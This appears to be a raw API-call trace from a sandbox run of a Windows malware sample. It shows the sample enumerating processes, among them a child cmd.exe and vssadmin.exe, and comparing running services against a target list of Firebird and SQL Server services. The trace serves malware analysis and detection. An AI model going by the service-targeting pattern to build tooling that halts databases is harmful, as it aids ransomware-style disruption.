	[0057.888] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0057.888] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0057.889] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0057.889] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0057.889] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0057.889] lstrlenW (lpString="cmd.exe") returned 7
	[0057.889] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0057.890] lstrlenW (lpString="conhost.exe") returned 11
	[0057.890] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0057.890] lstrlenW (lpString="vssadmin.exe") returned 12
	[0057.890] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0057.891] lstrlenW (lpString="VSSVC.exe") returned 9
	[0057.891] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0057.891] lstrlenW (lpString="svchost.exe") returned 11
	[0057.891] Process32NextW (in: hSnapshot=0x23c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0057.892] CloseHandle (hObject=0x23c) returned 1
	[0057.892] Sleep (dwMilliseconds=0x1f4) 
	[0058.485] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df3170
	[0058.486] EnumServicesStatusExW (in: hSCManager=0x7df3170, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0058.486] GetLastError () returned 0xea
	[0058.486] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0058.486] EnumServicesStatusExW (in: hSCManager=0x7df3170, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0058.487] CloseServiceHandle (hSCObject=0x7df3170) returned 1
	[0058.487] lstrlenW (lpString="Appinfo") returned 7
	[0058.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0058.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0058.487] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0058.487] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0058.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0058.487] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0058.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0058.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0058.487] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0058.487] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0058.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0058.487] lstrlenW (lpString="AudioSrv") returned 8
	[0058.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0058.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0058.487] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0058.487] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0058.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0058.487] lstrlenW (lpString="BFE") returned 3
	[0058.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0058.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0058.488] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0058.488] lstrlenW (lpString="CryptSvc") returned 8
	[0058.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0058.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0058.488] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0058.488] lstrlenW (lpString="CscService") returned 10
	[0058.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0058.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0058.488] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0058.488] lstrlenW (lpString="DcomLaunch") returned 10
	[0058.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0058.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0058.488] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0058.488] lstrlenW (lpString="Dhcp") returned 4
	[0058.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0058.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0058.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0058.488] lstrlenW (lpString="Dnscache") returned 8
	[0058.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0058.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0058.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0058.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0058.488] lstrlenW (lpString="DPS") returned 3
	[0058.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0058.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0058.489] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0058.489] lstrlenW (lpString="eventlog") returned 8
	[0058.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0058.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0058.489] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0058.489] lstrlenW (lpString="EventSystem") returned 11
	[0058.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0058.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0058.489] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0058.489] lstrlenW (lpString="gpsvc") returned 5
	[0058.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0058.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0058.489] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0058.489] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0058.489] lstrlenW (lpString="iphlpsvc") returned 8
	[0058.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0058.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0058.489] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0058.489] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0058.489] lstrlenW (lpString="LanmanServer") returned 12
	[0058.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0058.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0058.489] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0058.489] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0058.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0058.489] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0058.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0058.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0058.490] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0058.490] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0058.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0058.490] lstrlenW (lpString="lmhosts") returned 7
	[0058.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0058.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0058.490] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0058.490] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0058.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0058.490] lstrlenW (lpString="MMCSS") returned 5
	[0058.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0058.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0058.490] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0058.490] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0058.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0058.490] lstrlenW (lpString="MpsSvc") returned 6
	[0058.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0058.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0058.490] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0058.490] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0058.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0058.490] lstrlenW (lpString="Netman") returned 6
	[0058.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0058.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0058.490] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0058.490] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0058.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0058.490] lstrlenW (lpString="netprofm") returned 8
	[0058.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0058.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0058.490] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0058.490] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0058.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0058.490] lstrlenW (lpString="NlaSvc") returned 6
	[0058.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0058.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0058.491] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0058.491] lstrlenW (lpString="nsi") returned 3
	[0058.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0058.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0058.491] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0058.491] lstrlenW (lpString="PcaSvc") returned 6
	[0058.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0058.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0058.491] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0058.491] lstrlenW (lpString="PlugPlay") returned 8
	[0058.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0058.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0058.491] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0058.491] lstrlenW (lpString="Power") returned 5
	[0058.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0058.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0058.491] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0058.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0058.491] lstrlenW (lpString="ProfSvc") returned 7
	[0058.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0058.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0058.492] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0058.492] lstrlenW (lpString="RpcEptMapper") returned 12
	[0058.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0058.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0058.492] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0058.492] lstrlenW (lpString="RpcSs") returned 5
	[0058.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0058.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0058.492] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0058.492] lstrlenW (lpString="SamSs") returned 5
	[0058.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0058.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0058.492] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0058.492] lstrlenW (lpString="Schedule") returned 8
	[0058.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0058.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0058.492] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0058.492] lstrlenW (lpString="SENS") returned 4
	[0058.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0058.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0058.492] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0058.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0058.492] lstrlenW (lpString="ShellHWDetection") returned 16
	[0058.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0058.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0058.493] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0058.493] lstrlenW (lpString="Spooler") returned 7
	[0058.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0058.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0058.493] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0058.493] lstrlenW (lpString="swprv") returned 5
	[0058.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0058.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0058.493] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0058.493] lstrlenW (lpString="SysMain") returned 7
	[0058.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0058.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0058.493] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0058.493] lstrlenW (lpString="Themes") returned 6
	[0058.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0058.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0058.493] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0058.493] lstrlenW (lpString="TrkWks") returned 6
	[0058.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0058.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0058.493] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0058.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0058.494] lstrlenW (lpString="UxSms") returned 5
	[0058.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0058.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0058.494] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0058.494] lstrlenW (lpString="VSS") returned 3
	[0058.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0058.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0058.494] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0058.494] lstrlenW (lpString="WdiServiceHost") returned 14
	[0058.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0058.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0058.494] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0058.494] lstrlenW (lpString="WdiSystemHost") returned 13
	[0058.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0058.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0058.494] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0058.494] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0058.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0058.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0058.494] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0058.494] lstrlenW (lpString="Winmgmt") returned 7
	[0058.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0058.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0058.494] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0058.494] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0058.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0058.495] lstrlenW (lpString="WPDBusEnum") returned 10
	[0058.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0058.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0058.495] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0058.495] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0058.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0058.495] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0058.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x158
	[0058.497] Process32FirstW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
